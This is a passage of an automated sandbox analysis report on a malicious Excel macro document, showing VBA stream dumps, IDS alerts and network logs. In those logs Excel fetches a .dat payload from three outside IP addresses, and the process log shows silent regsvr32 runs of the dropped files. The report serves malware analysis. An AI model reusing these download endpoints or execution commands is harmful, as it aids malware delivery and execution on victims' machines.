    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
    Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2870
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
    File Type:data
    Stream Size:2870
    Entropy:3.43433789387
    Base64 Encoded:False
    Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ D . . . . . . . . . . . . . . . " . . .
    Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 03 00 00 00 00 00 01 00 02 00 03 00 00 00 00 00 01 00 00 00 04 00 00 00 00 00 01 00 02 00 04 00 00 00 00 00 01 00 00 00 05 00 00 00 00 00 01 00 02 00 05 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 162
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
    File Type:data
    Stream Size:162
    Entropy:1.52701399658
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 11 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 213
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
    File Type:data
    Stream Size:213
    Entropy:1.85324367791
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0c 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 206
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
    File Type:data
    Stream Size:206
    Entropy:1.75287863305
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_4, File Type: data, Stream Size: 361
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_4
    File Type:data
    Stream Size:361
    Entropy:2.18651771388
    Base64 Encoded:False
    Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 10 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_5, File Type: data, Stream Size: 356
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_5
    File Type:data
    Stream Size:356
    Entropy:1.93515224578
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 04 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_6, File Type: data, Stream Size: 170
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_6
    File Type:data
    Stream Size:170
    Entropy:1.65437585425
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . 2 . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 07 00 10 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 0c 00 00 00 00 00 00 12 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_7, File Type: data, Stream Size: 156
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_7
    File Type:data
    Stream Size:156
    Entropy:1.63365900945
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 06 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 06 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1097
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/dir
    File Type:data
    Stream Size:1097
    Entropy:6.73283410172
    Base64 Encoded:True
    Data ASCII:. E . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . . . ] c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
    Data Raw:01 45 b4 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 a2 1b a0 5d 63 02 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

    Network Behavior

    Snort IDS Alerts

    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
    10/14/21-08:29:31.072682TCP1201ATTACK-RESPONSES 403 Forbidden8049165185.244.150.172192.168.2.22
    10/14/21-08:29:31.335268TCP1201ATTACK-RESPONSES 403 Forbidden8049166185.123.53.220192.168.2.22
    10/14/21-08:29:32.317745TCP1201ATTACK-RESPONSES 403 Forbidden8049167101.99.90.219192.168.2.22

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Oct 14, 2021 08:36:22.746656895 CEST4971080192.168.2.4185.244.150.172
    Oct 14, 2021 08:36:22.776273966 CEST8049710185.244.150.172192.168.2.4
    Oct 14, 2021 08:36:22.776478052 CEST4971080192.168.2.4185.244.150.172
    Oct 14, 2021 08:36:22.777395964 CEST4971080192.168.2.4185.244.150.172
    Oct 14, 2021 08:36:22.806988955 CEST8049710185.244.150.172192.168.2.4
    Oct 14, 2021 08:36:22.951047897 CEST8049710185.244.150.172192.168.2.4
    Oct 14, 2021 08:36:22.951255083 CEST4971080192.168.2.4185.244.150.172
    Oct 14, 2021 08:36:22.969278097 CEST4971180192.168.2.4185.123.53.220
    Oct 14, 2021 08:36:23.019942045 CEST8049711185.123.53.220192.168.2.4
    Oct 14, 2021 08:36:23.020121098 CEST4971180192.168.2.4185.123.53.220
    Oct 14, 2021 08:36:23.021464109 CEST4971180192.168.2.4185.123.53.220
    Oct 14, 2021 08:36:23.071491957 CEST8049711185.123.53.220192.168.2.4
    Oct 14, 2021 08:36:23.172099113 CEST8049711185.123.53.220192.168.2.4
    Oct 14, 2021 08:36:23.172281027 CEST4971180192.168.2.4185.123.53.220
    Oct 14, 2021 08:36:23.177627087 CEST4971280192.168.2.4101.99.90.219
    Oct 14, 2021 08:36:23.354695082 CEST8049712101.99.90.219192.168.2.4
    Oct 14, 2021 08:36:23.354881048 CEST4971280192.168.2.4101.99.90.219
    Oct 14, 2021 08:36:23.356272936 CEST4971280192.168.2.4101.99.90.219
    Oct 14, 2021 08:36:23.534174919 CEST8049712101.99.90.219192.168.2.4
    Oct 14, 2021 08:36:24.123410940 CEST8049712101.99.90.219192.168.2.4
    Oct 14, 2021 08:36:24.123629093 CEST4971280192.168.2.4101.99.90.219
    Oct 14, 2021 08:37:27.950434923 CEST8049710185.244.150.172192.168.2.4
    Oct 14, 2021 08:37:27.951473951 CEST4971080192.168.2.4185.244.150.172
    Oct 14, 2021 08:37:28.173221111 CEST8049711185.123.53.220192.168.2.4
    Oct 14, 2021 08:37:28.173367023 CEST4971180192.168.2.4185.123.53.220
    Oct 14, 2021 08:37:29.124901056 CEST8049712101.99.90.219192.168.2.4
    Oct 14, 2021 08:37:29.125102997 CEST4971280192.168.2.4101.99.90.219
    Oct 14, 2021 08:38:12.770709991 CEST4971280192.168.2.4101.99.90.219
    Oct 14, 2021 08:38:12.770812035 CEST4971180192.168.2.4185.123.53.220
    Oct 14, 2021 08:38:12.771138906 CEST4971080192.168.2.4185.244.150.172
    Oct 14, 2021 08:38:12.800638914 CEST8049710185.244.150.172192.168.2.4
    Oct 14, 2021 08:38:12.821130991 CEST8049711185.123.53.220192.168.2.4
    Oct 14, 2021 08:38:12.947643995 CEST8049712101.99.90.219192.168.2.4

    HTTP Request Dependency Graph

    • 185.244.150.172
    • 185.123.53.220
    • 101.99.90.219

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.449710185.244.150.17280C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Oct 14, 2021 08:36:22.777395964 CEST93OUTGET /44483.3585885417.dat HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 185.244.150.172
    Connection: Keep-Alive
    Oct 14, 2021 08:36:22.951047897 CEST94INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Thu, 14 Oct 2021 06:36:22 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Session IDSource IPSource PortDestination IPDestination PortProcess
    1192.168.2.449711185.123.53.22080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Oct 14, 2021 08:36:23.021464109 CEST94OUTGET /44483.3585885417.dat HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 185.123.53.220
    Connection: Keep-Alive
    Oct 14, 2021 08:36:23.172099113 CEST99INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Thu, 14 Oct 2021 06:36:23 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Session IDSource IPSource PortDestination IPDestination PortProcess
    2192.168.2.449712101.99.90.21980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Oct 14, 2021 08:36:23.356272936 CEST100OUTGET /44483.3585885417.dat HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 101.99.90.219
    Connection: Keep-Alive
    Oct 14, 2021 08:36:24.123410940 CEST108INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Thu, 14 Oct 2021 06:36:24 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Code Manipulations

    Statistics

    Behavior

    Click to jump to process

    System Behavior

    General

    Start time:08:36:17
    Start date:14/10/2021
    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
    Wow64 process (32bit):true
    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Imagebase:0xd70000
    File size:27110184 bytes
    MD5 hash:5D6638F2C8F8571C593999C58866007E
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:08:36:23
    Start date:14/10/2021
    Path:C:\Windows\SysWOW64\regsvr32.exe
    Wow64 process (32bit):true
    Commandline:regsvr32 -silent ..\Celod.wac
    Imagebase:0x11c0000
    File size:20992 bytes
    MD5 hash:426E7499F6A7346F0410DEAD0805586B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:08:36:24
    Start date:14/10/2021
    Path:C:\Windows\SysWOW64\regsvr32.exe
    Wow64 process (32bit):true
    Commandline:regsvr32 -silent ..\Celod.wac1
    Imagebase:0x11c0000
    File size:20992 bytes
    MD5 hash:426E7499F6A7346F0410DEAD0805586B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:08:36:24
    Start date:14/10/2021
    Path:C:\Windows\SysWOW64\regsvr32.exe
    Wow64 process (32bit):true
    Commandline:regsvr32 -silent ..\Celod.wac2
    Imagebase:0x11c0000
    File size:20992 bytes
    MD5 hash:426E7499F6A7346F0410DEAD0805586B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Code Analysis

    Reset < >